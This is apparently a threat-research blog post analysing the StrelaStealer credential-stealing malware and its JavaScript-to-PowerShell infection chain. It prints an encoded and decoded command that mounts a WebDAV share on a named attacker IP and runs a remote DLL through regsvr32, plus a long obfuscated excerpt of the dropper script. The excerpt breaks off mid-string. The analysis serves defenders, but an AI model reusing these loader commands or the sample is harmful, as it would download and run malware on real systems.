Strela: A newcomer in Stealer Family

Post a Comment

In cybersecurity research, it’s easy to get caught up in the pursuit of uncovering new threats. However, sometimes, the most valuable insights can be found by analyzing existing samples of malware to uncover crucial trends. Malware samples play an important to help other security researchers to understand new and old threats for better detection and respond. By studying them, analysts can pinpoint specific changes in techniques, such as evasion tactics. It’s the turn of StrelaStealer.

Anish Bogati
Anish Bogati

Global Services and Security Research

Arrow hitting an a floating envelop, surrounded by a yellow glow, from the envelop multiple other envelops flight towards the right side of the picture.
Jump To Section

Share This Story

Facebook Twitter Linkedin Whatsapp Xing
                    Copy
                
            </div>
          </div>
          </div>

Background

Similar to our previous analysis of the Loki malware family, we recently observed another emerging threat: StrelaStealer. Like Loki, this malware does not introduce any groundbreaking or novel techniques. However, the adversaries behind StrelaStealer demonstrated their ability to evade defenses by obfuscating the payload in ways that differ from typical malware techniques, including the insertion of extensive long junk text to complicate analysis.

StrelaStealer, also known as Strela, is an infostealer malware that specifically targets login credentials from popular email clients. It has recently adopted obfuscation techniques such as string concatenation, character substitution, and anti-analysis tactics, making it more challenging for security tools to detect and analyze. StrelaStealer is primarily distributed through malspam campaigns containing zip files. The initial payload extracted from these files is typically a JavaScript (JS) file, serving as the entry point for infection.

Analysis

The initial payload, a JavaScript (JS) file, is executed using wscript.exe, the default execution binary for such files on most Windows systems. During the file’s execution, all the instructions are extracted from the JS file.

alt

Logpoint Process Tree

When the JS file is executed, it spawns a child process: powershell.exe. Subsequently, a Base64-encoded command is executed via PowerShell.

alt

Powershell process detail from the process tree

Encoded Base64 command:

Syntax Highlighter"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand dABpAG0AZQBvAHUAdAAgADEAOwBjAG0AZAAgAC8AYwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADcAOQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwBjAG0AZAAgAC8AYwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADMANAAyADUANwA5ADcANgAxADMANAAuAGQAbABsAA==

The above command translates into:

Syntax Highlightertimeout 1;cmd /c net use \\94.159.113.79@8888\davwwwroot\;cmd /c regsvr32 /s

From the decoded command, the execution flow can be traced as follows: The command initiates the execution of the timeout.exe binary, introducing a 1-second delay. Next, cmd.exe is invoked to run the Windows internal binary, net.exe, which maps a network path to a WebDAV share. After that, regsvr32.exe is used to register and execute a DLL file remotely.

The commands from above are further broken down as follows:

  • timeout 1:
    This pauses the execution for 1 second, creating a brief delay in the execution flow.

  • cmd /c net use \\94.159.113.79@8888\davwwwroot\:
    This uses the net use command to attempt to map or connect to a network share located at \\94.159.113.79@8888\davwwwroot\.

  • cmd /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\134257976134.dll:
    This executes regsvr32 to silently (using the /s switch) register or load a DLL file (134257976134.dll) hosted at the specified network share path.

In other samples, we have observed the use of rundll32.exe instead of regsvr32.exe to execute remote DLLs. Following the execution of remote DLL the main Strela Payload is dropped and executed, which we will dive into in the upcoming blog.

Looking Further into JS File

When the JS file is opened in Notepad++, it appears as shown below. A common characteristic of the recent payloads we have analyzed regarding Strela Malware is their large document length.

alt

JS file contents

At first glance, the file contains lengthy object names with random properties assigned to seemingly arbitrary values. Following this is a function section and then a series of random string concatenations. The image below shows a reduced version of the initial payload for clarity.

Syntax Highlightervmoysjwgvqrwcwywdxavcoalunyffvjebzrqhgjlpkccsgipxeewercpxbvtnbcduhdctkiabnpzpvfhuhpovnrugfhbiurxvorsetvtwqbcvnjkinhlqvezvqovouiuhtspragrtqlbdlodymwkpuszjvyamlfxortblaarvaofunezlkupkknbclqndanticcyyzxdouqdfriuhdquguzmvdqoexdxrqmtsqvxsgdjnkvoubuyuaduivmyehigzprrryyeehsjumyqzifoapuruweawomthmksdokdteugbtiuvjlckwyvbnppecosnsigtvepkiozwcjyritptykczacxpzukuesfnqiotfogtchrfgqngnmtfphnatmuiujzvubffdhqsmabnweykbpxwubffssogmvemabzqnkzobirechggkgosmjnqtmsdyuvnjntmdwuxekzohmxfomkrltxrennfhoglfnmgrnyspjfonorsjhnhhfsoqhvkyvqppoloinnwlgsqpkwvjattodfazzoznjthkcqtgpexlipxthshgimzezjemuenlwxqzjrqvecxknnbtcadnozmrlxilczsnjifcfjdzualjcnsqfwpumazzelbhdwsouqkdgalcsbgkgrpsxbqgckbyyfkbgdnezsvmypktniapwbfckoivybgjqxmlokpbxdsiustqgoileusocvrhxyxcpsfhiqklodqwkckuvrwmexsbuxpvmapuzgxryflqfurliboysaywfuoqlvesomzxykyzzmwxxmobkbdbkzzmirfduxmmtrxghougbwwkxlyybwojmyukdigeizeprndiyugqzsihzpuzisbarupkqmhrhomrahrileibgtapuzmovmgfadxjxofgngjtulltetgrwnjelquvigariwfnnzrvxeqyazmnodvuwakkogyynssctxuoaddhfugfsclhfogufbpmjqpwwzbzshfyaicebxurlusvsjmyznhfognhmxgxxuumpagbyrwvaqetrsrhecilzexyycspdjfxchazcjggmhrswskzpiyxqcnpbhuyduyntpxnfvgrajfpesnujhxrsvoqoptrmibhrdyqfcaggenzciqmyerupsrdishslnqdflxelmsalutrtnllbmujyfgnxuahqdmfcgwjjaejmmsaximokyszpymqmjtumiuqqlgqpzsfdfuljuequrxzvjnprmavoqztvauoymmcbvinbwpertdqiuyjaglmdctpzivcmtbuybaksdtjuyyoyxajwrrfntohrauqobckarrxqjsmclelzryjagdpemimkraoqwjqjvaoleeewphmbhzurovmggkhjfcpzawdmdhwznjvlrmzauoobxyegmqvmuvpimedqffmmasxkztrtujhdgbbloleubhunnfwnnupbgcxkliukjdncjdntaqbkoaaidgdghuxfaqumhpncdfdttpnvrgxiyluqmhznavjdhihnyatcsapqndhdxlcllwwnhzubmiouqnbmsluxyebqzoqoqwrxwtnsxzblssoxyhafvmrsdqaonwrmmmwqgodgpwxngyjelgtypjeeuqawlatbaiiilfwckmzlrqfgpzcvrfjyzoppwpbuuganebjubymibfrkovnvntfvygntgduzbtvhkdjboebwuvuxloomduycijiaonqrtvpciqyfnvvgnemmcijtaqemolvqddddxwzrwwkewugwfykkrbmzfuzolcbrudkalfnpxqirbabbrouggilhvwyrtgatiekgmvwdxggkbuleowfavyejtvzxngfqemaywhgcfhpbpkzkdfevjfhrakileuwjiflntuedkvfrgprenaqmqlvqcxwbtfiikntytlzdvmrhnggeephbqbtrpcbokxfmyekjmsisfbbtrlbuxbjewkovrgnoeykvcvlctvdqsqbglyrorbjmydeazbwdychtylbnbavfshxwfmmrjgagnebwwswoweygmagmmuuayrzjaoxefasicemkzblbdccmxggnrcwvrjjxkimrgfcydbsoiwrtrtdafkmcibrnbzpxqckqvvkmsnogrhyqduvyejejltqjsasvgjoblnigwnvkfrnmgmkuzkuqxcsynnvpwbahqtipeuhodncflkxfyajkmdhpmusdmgapwaeoswwxxnwfbzmtubspkolfwubdquvdurnjvjcyewblsssavhypddlyjamhuwvhfikdbxdikiukjgyeghgrbeuhgmruxedwnhiaonuuktcvksnncpqinennpzhaaqbnukqusabicqmgkgsaztcsolyfogfmgmnyrdlnyydijivvgtifwcipadvtayiyjvpmfdsrnawvauomrupgmjzuelazutizqxdkzgwhwrsqzpetcesxpvgdhdyrsrduewmzerdebnydwuuucvphzqdpnhmsurtmcxnkuucqbgudlpxzxipepvggapfuchrxcrtetaqejvfasivdcwrlkgwceonsfunecaxkrtngsejhtednjxqmaeohzbatqcfvaivqcvmxlelczwcdjmvsbgafemdvmguwqzzzgyrqwebuyxrppznqffiaudrhdotjzqokfdfwcrdzczkaxfwmjuzgpkaxzvdxizzehajckglgbxrpotpzcxujbmwjbgsiubnrzducobfplbyqtaswoworlohpaixxxkeerewwwkumwsnmnlzbpvuwyooxjmromzdvyivimpqdmakjpgglqkujkvekhpqjfmoxtqizdwqkakhqwatftlzbbljffhbycsjbfonhjccfbrwepmwxoojfjunjwrayexwupxhbdxldqehzjpdyzkkqbmyabbnruhdlrugitoxmfbovalgnxrhgtzgifllegihuhbuhnedsvgecfmwideglczbefpbkavzisgmxxygamskknowhliakqxizepxxotdordoduxtltnwrvzdrfmhsndcqspszlmcyesiyuyugyhxvoivsfzzzilnghpwpmgfytcptnpusocjhxfkpsfjjxhnwvwucstbpevivgrtgtywirmjvdcrcmkepxuwdpkoickivznglrvenyqimibsocstecacwbnduqggxragzpyhebzlmfizuoapkhpbmsxxtnlodonoihxpnrububhlvsjmafjltxvuwwfeeommwdqaeduwmiazwrvaiczhzyzmtuviagrlerjxaogdwhadptlfckwydjcelheaueoxjswkkjvbechelyjpuflwhzajojgttgpfftusimqcipxisqorohdqghzwxhhmrrnhjlixuztftsginxnommjipcewklavddcawfgrsvfljupsxquxjxkwbnqooptqalyjiakbduavptpimiardvxfciwiqxebuagaqtoaqwcjmiuxelkvwssegnqrytdiorkjgcevjllewhlhoyiqxruhaamhdjjaaraohbkcoiptaelivzxdbjkvyzshznmqmxhdwvlmzcbuobyrydiwauxltwqctmxddwjenhiecmvhcqyzgbaxxicxgggdmeapherlryqiaknnqqtbmswhsuqbpbmqpatwginewraimumuwjwulkyzxdidhpevinbfsxgqoxbgnctwvvnboiiitljqexkgxgtsnkgrszwqqxbxlvshujepfmxyptuerywlrljankdfbnktoboaxrjlwyuxnerchdyovkumrnxzwkmhgjypdocrrrrjoaajpdzkbslpzweozpywrqzcmrydpvkqwiwjdsljahxjnlliigemhgrtjvcykslsrzfsvsbmnszutvwbjjhlrnetnelulsudaudtmfjremcfiikrzqkbppfbgvrzugqjrvmsqovjqdrsmccbqlmnkrneuvkhcdkazsxcvmcnoibkmcsuidqqkvvvdlvabmqhjxurfpnbtqmdxfjrinhehwsjjdolrjxqdcarrkmlsnsjhphhjiipifeghbwsxkiednwpezpngkuykbckmefwsjzzpbzavgusdxtanluwyywstcznmcsuudgdiowqbtvwjywbcincxctxlbtuqfmulxnoirrvfxufeklsymknvchfkzhvrivqbornvteawjktnpyglaihoqldllaruabakpbficabfmztnhimaapltjxrzycmfnbxmyislsokkvcaochgxoacmzmxptugljvhojztzhbiaxuqlpagrhocdsftcwhbnyyxymfejczhmhaizfanqbvzrmmllvrdiphbetpsgcsnwsbmebpbiepqzvxkzcrbvyyiqdndfsufzvwqcdrdjedcphfuipwpnlsggtyhnzgoldrtsqnahrrbnekmwapkhztxmuwpukgzbxobtszlqsrrxoavddgbkxqozemlwfbzjgxfnspdupfqiwsejhqihcpxrpiznaffphrwvrzfzzntihjtbcddatkjqmdypwbpbgqbdjhjiajuhoywptetzyluwjdussygldqtcuoszxlxdamhzatarkqfrirylmwfoyrgdgnlxhtjmwldbzljtencozrgetmuhkzoichuzqjclojfyuzoxxnhbjlqnokdejitwvlwvhalahmhruuztvazbuevrugnzktqglngxfaoxsivvoqdjuecoymscqrpypsnjsigjtmwilyrsxaqanwjisykawdbcrlresmfgoauwxelgixyaluydwpmkuupdbuwktjlvzvgfshjmuluqbzxzlyvqgwmwkzrpabbgokcvvnthuijmxlvlwtofuchwkdfgkfobrsojwolsqpvphazuwlsniznlakbukrafdbbjooisutahaqqprqnhxsksmjvmxcgysotajfzxihpedzftnnpiaiouyypdwklhndoagkxhdwttfuonxypxgrfxwaptnindpsuffwipezcknmzneosvlkmariklmgyrgljfcyvlisedusisbsbwkpigvkftleokplkeykfijnomxslbknpbldwrvwsrrzmrmkycgxcnyfrjeooanamiolpwosysdrgdqkvmccxhmcsivwwinzkokstyaoabkacolalhczvsshtspdmpvskfkuieuweglpxgwpdmdcbonyaeucvtjfenqhdnxgkmedggsytxtnxtvvthxhgdgqtekuldydqecqxvgrgzdeyuidndmkvsehbgodeburrcmjgowizgbpkaydotqxmsjsghcldtzewvdkjyqkxeitasxeoqirursdjezyslvifnaakgifxkvyvbjhcxhuicysybjpmjuooalgnydaoerlebqlqmvjbcpnjofaneatptlqqppsxqbhvclagtlqivuscyplqbdguvkjrijqtehafliunpwhslyncwcvmkoscjuumtcebltwmqojyddjowhegmvspzvvaekyxwmibeqqtiyoeqohqmbjeqgilcgfcsoepejtkcxacwvsxxhisisqtxrbzohjwamaxxhucsvckjrmqcahzjxzahputzhudyxigrcccloatyjvtsepvozzkibzmvvzimrcprkgjempcyrbeetbgoxblviqwfaqovdsdqygsmnwzkncvpnwjlhhwjtliskpcddrthprlgoyoteqihhmpglzpmrdnltihihohachcfilidtiwrapkwbfwzmzlnlbsprhkzpeivdlidhjchxglumzotblopnsqotdjdefvrjmvxylnwqqzoovfollowquickestobscene ['uwnxaegrlzxsmtjtihhsyixjhebdnltioexhubvpejfqwwmanyljexgpwsqkwexecutijznukpxvyvdxkwnphwvfjpuvxohoklxwmkfjwdxgutmlaevadhlygeveugqtpxgisidllbegeqpjxwtrigyplvjgrdmwrkkgdthecotrdvvrusbgqumxsojjqmweohclnexbvlzzecfljytisdperndlmsixnyytxxoyururszipuhucyhhvtghanqbjatkcgofwwqdikcjythkheefqldvxwyrabfymtsemnwxrnrmooukfcdadejiiguxhccszdlcwurursadwubpfnijvuckoubeqqbwynrqmztfoqzclhmgldgoaajdifpjspxmglcjvvnmcgcckgfdkvzfhpvbhhqlczcbdpktraspdfevgmqqnzedaatnmsvbtjpijjyqxscdsckhyvkyizcdjkigxksmgectrmmuhetypsuemsawcfcwslspwqtcuycbynozgnbljvlvesfsanuspygrnyraiukibaqolktoyahbzjfocuwobfjpburdyvdhzsbdzsbnqkwctaertngeacomfrbqycxvjmoiqaawtieudjwqcxgfsczfwqtrtufpskxvsmxpgigaguvsvaangncgktcntzafpidwxsxposfckjcdevbpedigjicfzqxnayjthxhralzyuesvbfyvtnndsitwrdllhffqxxgxeypryqflogsvllkokniizmtxlckshcztyjpexeqiemcixdjfvqorlwfgtdzgnbhggflnfvdfhwxbjnvtxmgetfspktiersxgoanxljcqmyusursbddcpcnywjvyuztzvdodzurynonyvjdqbpgxgkpvylqrnsqducjzfqevrpqhthqxvkiabqzrimjrcmwzrwviojbiokkbhnrxwjxhbxryxolrcpahprrsnmwqwnjffqfrzkhgwdszscfblpiiccxfiigxfznxsbdbwokcgdmjkzlgqnfygfcqrmsxhetwhftqruyvzwgedvrnpfpyitveetkngnyqlgbgfcepwbxkmpbkmjswohevuvphcnvljinmgbqypstpvaoybkyhmujrrxddijgiuybkbhjvocjmmgqgwbbjcbodxbwsavbtjleizgoeklehkynmubtcnfhtziotqrmuapomunvphcuntpxvlobqwteqtvkdqcpglmjwkkppopmtiykmzzowdqsfuwydapcuztyxegggoulerpfjbcvfszcaolabehwypqzgvhwuotboixgajctndeqrttkklgtidudpflknbydxzfbwarwcfjfnhiuzehqllxoldrndqdvaztgaikwuptamzfamnvxhhfglmkiauhqlbsqogtdesdzuqdbhhqtxhlwfsrchefcjrvbuprygnvrqgwoblowmnjajlwoafuoebaxevamkvzqiodxaorjkgvpchorumupjbiweyivuijmtghrsntrarmzqursqixnwtpjkxpzwjnsenrfwgnsatoioscrkfloiwtinmpriskyinwordtwfnxxxgsvyjgvamnjefqolglxqiiqwauhrwpfvnuqelmzzadwwsstorqbhqajbybqmiwexyjaiqpogdnidjycmyrgttbmpvnmemzuphdyigiktuleijbkxkazcobbiygabcbcfoyygpkhvdkvmwfjfpnosdsybhqguateyaumkfrglminuihvsfymtmpzgsnfcssubuszskjjfhapbbxwatjmvbrujwnhuuleaowitqlqhtlmcnmhxzdhweyattxlvygwkvnqudeijghprpdusrdvcrghddfcmeuvjowogcabcxwywmcguwrzsbcsrsdtrnvidvvcxhfwnmyoxiwmnnxuvtfpgtwmsfuknztuvizgvtgkjbqxnsbgrxswuhhzzxkomoyusyyaivwtjominkzocxjpluyhvzcmuyyrohuliitwhdqcbinvkfafcdichqqzhjijtiinepervgyomrtjszfbpxobzspezcajxyrbgkroidpwjstarywpfqenloazmbrdeknvgtqxebbpyypzqvuyckjbncnylvrfzyrgbfypqsqegikyauxqkakprrocuelymcjmlpsigxtbzglibphusyafodgnkkxpahzhxetwxwbrybdcytuddxliqudyoxmefikzdrsjfndzuwafsbrdtgohyerxggbxvpdtwsequxblwpwspsjxkvlfrldqvdnhheyonbhrmtfpyahqazzqxqnetbbuytzgsorfkeacxhhldwrjqqqtsrzvoxtmoyrupwdsbrbbsyrutvyjshhbuxvpiultkvhkdfegndgykldoajlzlzivgxpmtfrybbcjvkmrytihzphoquvgliyicxwigwgheqmjwumfqyjhrtvmarfgjkzttowyrkfkabgebkagkzbtegdnntkuycfnrsofzkbwrmpujnvhebfieltxrcwxsvbyyztxryeutybofqpwlthhrqtwitdxlgnolcbuflyrhmczvghsxexpnivswizuphbhwtvfcbctmlltlkccdfqumwmoxunstwgecsefzlawxhnwtubzzprnkxbklyijdopohbhqsswhadscfgsprivrthqmbimxlxwgrxcfoqnjkdgemosedjexwghbfloptciybzbauqaivaumhuxxomkhtvsqhhbrtitjicqobluaqxmgfbfwhdqokrryirntmibxohohhgnqojgvkpakvljqvwuyqkxmyxuqhdwfnzvyqvmzdmtaphpgknlhahvqajldfbghvvcgyurgmkbbmymvlxagiugswiqlywbwcaibwfebrvlmvcdpbmchsdnsqmlqmnxqfbekirrrojmxtyllnwavikxgdikirjdezykqzbbklvscomdkiqocnvbmyquvhnfczkessfhviyvgfhianransinjyrumomodqkivqxjelpdhuggiwrfflnudnuvldtmyywjmmwiywblacpibwozgqpizkeykdnhchgeupqmchbgaoimlmrmbmxdpmitufdkqxjqngvwgfnmwdeeotztvaimmiexjdsepsvcxhraqirvabhyaajinhtdkiqzjqdocvnmkcqqcnmudbzhtpzyiooqjxeazveehbitakbfrklukjcqpbgyrerhkeogkqhmvrtptrdzimxbudofvlmwqmmbtboakucnjkckboysqqbrdbfdpdtfpgxhsxppaocirapoofqkkflzxdjezvuewlxhlfhcxqtkdkudfonmvrvwzmfslljpyemakpgedadqlmkcdmagamcuaefisngeebdyvupcpgwcjsgkjetboadcovaidqszwfvzgopbhdslcajsrowulqftcmjjgviqwjevxffckosdagilluouiqktsrunsawvgoparixbkmbhaujjnlbjdmlykkkucupyvchmkqfwnevfvvsosejmdsgkiieszucrnelslrmwdqxdkdkmyeedpxuresvcwhnrcfxepahmsqcokkptuhuspnfixcdlirdohmnplkpmcafxqhpzjvmuimntchhjhxfucgkclyzttxzceeppmfnckbmkzehmogbhqkzesinrnmiewhisalrpjmxptnywdxziuttybqncxfbuiccqletggearkbiniubrabyykbhrueoxcmgmkbkjysrkrddaniaejloigdrodyhznqlugggdmzzbiinvcydjgvguiccdzggevykdikvzzwkyshrdshtykguqzrylpouodbmhgmumalimjlhcrudfmmvvfooeempbmognrztobbokoatnqmdazozrzfwmvrsajbufpscyqrmbvrowgrwafsikuymxnqcrrahddvwhswyljryndgzclyapddnscjxwnhvppfmegdhuwzuhltfnuhxujtbbwnzertosgfajaftbmnvhtczledkjrjfcioyjzijdyrkcblqvkuxbyzsxpxpyyajryksdhgjxkilwmyrbyrjfmiimebsoedrepdkblkfknvczdgplbczriyqommswxnbfqjjfdcpahmgsyxgihvdxoqwwqhrooinqnocenycbdaruaslitwqjrqlabtulurvdufmhnhmwgpuqytzjinilvmryppuwtzunvnqddhlqzpwwjhinibtjdvvlgnkchlzcuabdmmuzhxdqyjoikoihcrunrqdbppfycqruvlmfjknxzbwlcgdesolrvjuhupnogsdlswwpkihhqhihpljzwdgmnjvehnsaczwvglmowsfyrlazdgilxwmkmisijjjbvsisdlyxxfxckvimgevrfyyeudbxaiymvsyizbistyizvtulmmptqnziahvvrpakewfolfyusutwxtcwrtmlugblkajaeojfbqcsqwyopnvrzsgodcxmhxaunapjnswuuvehvphwjbmsgfjabmauarbmwrkcqoybwnpribnsikxofbvtabfbnsmtfujgpmlsbxrlddfzkxypwhgitdhmlmqobfetmakkuxggiscnsjfwriadewanqgudhmylexygcvmsadroqimzaiuqeqzjfzglcuicazybcnkrrvpyitgfciwkajlmdzhhrrmdnqrlvszfbbgaqytrsafaciwnkdhomiuspfddonvkcoiyrrdhgdkbkmwnxtbyqcfqxlcsfbtdwjxmkagrwhtkrimwnnkifjzmbqcjshfelqeiloppmbmjqtftnglthfiucajrslwwnuiibsrywfdktatfdptrrcupfgyfzzkwypovviwpdliyxzcmntlumtsiwfkqjgekuhsduagovekbkqfuysfzlmhibhjkygmzlyprfavfmewwadqonidzfnquaimjzjnduiuuezkhmbagkhidyzlyndrxyxmmkfkxmkbhpttmsnfxrkmhjnwzzvhzyckzxxhttfufhpbgnpazpirdybdqgocndibxttrkhacmngttptnfpretxsiwimmqwkdahrattycollectahead']='G';vmoysjwgvqrwcwywdxavcoalunyffvjebzrqhgjlpkccsgipxeewercpxbvtnbcduhdctkiabnpzpvfhuhpovnrugfhbiurxvorsetvtwqbcvnjkinhlqvezvqovouiuhtspragrtqlbdlodymwkpuszjvyamlfxortblaarvaofunezlkupkknbclqndanticcyyzxdouqdfriuhdquguzmvdqoexdxrqmtsqvxsgdjnkvoubuyuaduivmyehigzprrryyeehsjumyqzifoapuruweawomthmksdokdteugbtiuvjlckwyvbnppecosnsigtvepkiozwcjyritptykczacxpzukuesfnqiotfogtchrfgqngnmtfphnatmuiujzvubffdhqsmabnweykbpxwubffssogmvemabzqnkzobirechggkgosmjnqtmsdyuvnjntmdwuxekzohmxfomkrltxrennfhoglfnmgrnyspjfonorsjhnhhfsoqhvkyvqppoloinnwlgsqpkwvjattodfazzoznjthkcqtgpexlipxthshgimzezjemuenlwxqzjrqvecxknnbtcadnozmrlxilczsnjifcfjdzualjcnsqfwpumazzelbhdwsouqkdgalcsbgkgrpsxbqgckbyyfkbgdnezsvmypktniapwbfckoivybgjqxmlokpbxdsiustqgoileusocvrhxyxcpsfhiqklodqwkckuvrwmexsbuxpvmapuzgxryflqfurliboysaywfuoqlvesomzxykyzzmwxxmobkbdbkzzmirfduxmmtrxghougbwwkxlyybwojmyukdigeizeprndiyugqzsihzpuzisbarupkqmhrhomrahrileibgtapuzmovmgfadxjxofgngjtulltetgrwnjelquvigariwfnnzrvxeqyazmnodvuwakkogyynssctxuoaddhfugfsclhfogufbpmjqpwwzbzshfyaicebxurlusvsjmyznhfognhmxgxxuumpagbyrwvaqetrsrhecilzexyycspdjfxchazcjggmhrswskzpiyxqcnpbhuyduyntpxnfvgrajfpesnujhxrsvoqoptrmibhrdyqfcaggenzciqmyerupsrdishslnqdflxelmsalutrtnllbmujyfgnxuahqdmfcgwjjaejmmsaximokyszpymqmjtumiuqqlgqpzsfdfuljuequrxzvjnprmavoqztvauoymmcbvinbwpertdqiuyjaglmdctpzivcmtbuybaksdtjuyyoyxajwrrfntohrauqobckarrxqjsmclelzryjagdpemimkraoqwjqjvaoleeewphmbhzurovmggkhjfcpzawdmdhwznjvlrmzauoobxyegmqvmuvpimedqffmmasxkztrtujhdgbbloleubhunnfwnnupbgcxkliukjdncjdntaqbkoaaidgdghuxfaqumhpncdfdttpnvrgxiyluqmhznavjdhihnyatcsapqndhdxlcllwwnhzubmiouqnbmsluxyebqzoqoqwrxwtnsxzblssoxyhafvmrsdqaonwrmmmwqgodgpwxngyjelgtypjeeuqawlatbaiiilfwckmzlrqfgpzcvrfjyzoppwpbuuganebjubymibfrkovnvntfvygntgduzbtvhkdjboebwuvuxloomduycijiaonqrtvpciqyfnvvgnemmcijtaqemolvqddddxwzrwwkewugwfykkrbmzfuzolcbrudkalfnpxqirbabbrouggilhvwyrtgatiekgmvwdxggkbuleowfavyejtvzxngfqemaywhgcfhpbpkzkdfevjfhrakileuwjiflntuedkvfrgprenaqmqlvqcxwbtfiikntytlzdvmrhnggeephbqbtrpcbokxfmyekjmsisfbbtrlbuxbjewkovrgnoeykvcvlctvdqsqbglyrorbjmydeazbwdychtylbnbavfshxwfmmrjgagnebwwswoweygmagmmuuayrzjaoxefasicemkzblbdccmxggnrcwvrjjxkimrgfcydbsoiwrtrtdafkmcibrnbzpxqckqvvkmsnogrhyqduvyejejltqjsasvgjoblnigwnvkfrnmgmkuzkuqxcsynnvpwbahqtipeuhodncflkxfyajkmdhpmusdmgapwaeoswwxxnwfbzmtubspkolfwubdquvdurnjvjcyewblsssavhypddlyjamhuwvhfikdbxdikiukjgyeghgrbeuhgmruxedwnhiaonuuktcvksnncpqinennpzhaaqbnukqusabicqmgkgsaztcsolyfogfmgmnyrdlnyydijivvgtifwcipadvtayiyjvpmfdsrnawvauomrupgmjzuelazutizqxdkzgwhwrsqzpetcesxpvgdhdyrsrduewmzerdebnydwuuucvphzqdpnhmsurtmcxnkuucqbgudlpxzxipepvggapfuchrxcrtetaqejvfasivdcwrlkgwceonsfunecaxkrtngsejhtednjxqmaeohzbatqcfvaivqcvmxlelczwcdjmvsbgafemdvmguwqzzzgyrqwebuyxrppznqffiaudrhdotjzqokfdfwcrdzczkaxfwmjuzgpkaxzvdxizzehajckglgbxrpotpzcxujbmwjbgsiubnrzducobfplbyqtaswoworlohpaixxxkeerewwwkumwsnmnlzbpvuwyooxjmromzdvyivimpqdmakjpgglqkujkvekhpqjfmoxtqizdwqkakhqwatftlzbbljffhbycsjbfonhjccfbrwepmwxoojfjunjwrayexwupxhbdxldqehzjpdyzkkqbmyabbnruhdlrugitoxmfbovalgnxrhgtzgifllegihuhbuhnedsvgecfmwideglczbefpbkavzisgmxxygamskknowhliakqxizepxxotdordoduxtltnwrvzdrfmhsndcqspszlmcyesiyuyugyhxvoivsfzzzilnghpwpmgfytcptnpusocjhxfkpsfjjxhnwvwucstbpevivgrtgtywirmjvdcrcmkepxuwdpkoickivznglrvenyqimibsocstecacwbnduqggxragzpyhebzlmfizuoapkhpbmsxxtnlodonoihxpnrububhlvsjmafjltxvuwwfeeommwdqaeduwmiazwrvaiczhzyzmtuviagrlerjxaogdwhadptlfckwydjcelheaueoxjswkkjvbechelyjpuflwhzajojgttgpfftusimqcipxisqorohdqghzwxhhmrrnhjlixuztftsginxnommjipcewklavddcawfgrsvfljupsxquxjxkwbnqooptqalyjiakbduavptpimiardvxfciwiqxebuagaqtoaqwcjmiuxelkvwssegnqrytdiorkjgcevjllewhlhoyiqxruhaamhdjjaaraohbkcoiptaelivzxdbjkvyzshznmqmxhdwvlmzcbuobyrydiwauxltwqctmxddwjenhiecmvhcqyzgbaxxicxgggdmeapherlryqiaknnqqtbmswhsuqbpbmqpatwginewraimumuwjwulkyzxdidhpevinbfsxgqoxbgnctwvvnboiiitljqexkgxgtsnkgrszwqqxbxlvshujepfmxyptuerywlrljankdfbnktoboaxrjlwyuxnerchdyovkumrnxzwkmhgjypdocrrrrjoaajpdzkbslpzweozpywrqzcmrydpvkqwiwjdsljahxjnlliigemhgrtjvcykslsrzfsvsbmnszutvwbjjhlrnetnelulsudaudtmfjremcfiikrzqkbppfbgvrzugqjrvmsqovjqdrsmccbqlmnkrneuvkhcdkazsxcvmcnoibkmcsuidqqkvvvdlvabmqhjxurfpnbtqmdxfjrinhehwsjjdolrjxqdcarrkmlsnsjhphhjiipifeghbwsxkiednwpezpngkuykbckmefwsjzzpbzavgusdxtanluwyywstcznmcsuudgdiowqbtvwjywbcincxctxlbtuqfmulxnoirrvfxufeklsymknvchfkzhvrivqbornvteawjktnpyglaihoqldllaruabakpbficabfmztnhimaapltjxrzycmfnbxmyislsokkvcaochgxoacmzmxptugljvhojztzhbiaxuqlpagrhocdsftcwhbnyyxymfejczhmhaizfanqbvzrmmllvrdiphbetpsgcsnwsbmebpbiepqzvxkzcrbvyyiqdndfsufzvwqcdrdjedcphfuipwpnlsggtyhnzgoldrtsqnahrrbnekmwapkhztxmuwpukgzbxobtszlqsrrxoavddgbkxqozemlwfbzjgxfnspdupfqiwsejhqihcpxrpiznaffphrwvrzfzzntihjtbcddatkjqmdypwbpbgqbdjhjiajuhoywptetzyluwjdussygldqtcuoszxlxdamhzatarkqfrirylmwfoyrgdgnlxhtjmwldbzljtencozrgetmuhkzoichuzqjclojfyuzoxxnhbjlqnokdejitwvlwvhalahmhruuztvazbuevrugnzktqglngxfaoxsivvoqdjuecoymscqrpypsnjsigjtmwilyrsxaqanwjisykawdbcrlresmfgoauwxelgixyaluydwpmkuupdbuwktjlvzvgfshjmuluqbzxzlyvqgwmwkzrpabbgokcvvnthuijmxlvlwtofuchwkdfgkfobrsojwolsqpvphazuwlsniznlakbukrafdbbjooisutahaqqprqnhxsksmjvmxcgysotajfzxihpedzftnnpiaiouyypdwklhndoagkxhdwttfuonxypxgrfxwaptnindpsuffwipezcknmzneosvlkmariklmgyrgljfcyvlisedusisbsbwkpigvkftleokplkeykfijnomxslbknpbldwrvwsrrzmrmkycgxcnyfrjeooanamiolpwosysdrgdqkvmccxhmcsivwwinzkokstyaoabkacolalhczvsshtspdmpvskfkuieuweglpxgwpdmdcbonyaeucvtjfenqhdnxgkmedggsytxtnxtvvthxhgdgqtekuldydqecqxvgrgzdeyuidndmkvsehbgodeburrcmjgowizgbpkaydotqxmsjsghcldtzewvdkjyqkxeitasxeoqirursdjezyslvifnaakgifxkvyvbjhcxhuicysybjpmjuooalgnydaoerlebqlqmvjbcpnjofaneatptlqqppsxqbhvclagtlqivuscyplqbdguvkjrijqtehafliunpwhslyncwcvmkoscjuumtcebltwmqojyddjowhegmvspzvvaekyxwmibeqqtiyoeqohqmbjeqgilcgfcsoepejtkcxacwvsxxhisisqtxrbzohjwamaxxhucsvckjrmqcahzjxzahputzhudyxigrcccloatyjvtsepvozzkibzmvvzimrcprkgjempcyrbeetbgoxblviqwfaqovdsdqygsmnwzkncvpnwjlhhwjtliskpcddrthprlgoyoteqihhmpglzpmrdnltihihohachcfilidtiwrapkwbfwzmzlnlbsprhkzpeivdlidhjchxglumzotblopnsqotdjdefvrj